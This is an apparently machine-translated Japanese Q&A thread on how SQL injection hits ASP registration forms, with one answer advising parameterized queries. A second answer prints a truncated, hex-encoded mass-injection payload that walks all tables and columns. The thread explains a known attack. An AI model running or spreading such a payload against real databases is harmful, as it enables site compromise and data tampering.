ASPまたはASP.Netで作成された登録フォームへのSQLインジェクション攻撃のプロセスを知りたいですか?
2926 次
6 に答える
0
SQL インジェクション攻撃は、SQL をユーザー インターフェイス要素に挿入するプロセスであり、その後バックエンド SQL サーバーで実行され、望ましくない動作を引き起こします。SQL インジェクション攻撃を例を挙げて説明している記事については、ここをクリックしてください。ストアド プロシージャまたはパラメーター化されたクエリを使用するだけで、SQL インジェクション攻撃を解決できます。
于 2011-07-22T12:21:04.223 に答える
0
攻撃者は、フォームから SQL クエリをクラックするだけでなく、ASP でクエリ文字列または過去のメソッドを使用して、クエリ文字列の値を使用するページをソフトウェアで見つけることができます。攻撃者はその URL にスクリプトを追加し、Web サイト サイトのページ コードがクエリ文字列から値を取得するときに、値を検証するチェックが行われません。すべてのスクリプトは、実行のためにデータベースに渡されます。URL で使用されるスクリプトは 16 進形式であり、クエリ アナライザーでこのステートメントを実行すると、実行可能形式になります。このスクリプトを LIVE DATABASE で実行しないでください。これを行うには、ダミー データベースを作成してから実行します。そうしないと、データベースが感染します。
これらのステートメントは、データベースのすべてのテーブルをフェッチし、次にテーブルのすべての列をフェッチしてインジェクションを拡散する cusror を作成します。+declare+%40s+varchar%288000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f5343484 detail link
于 2012-12-28T14:44:50.593 に答える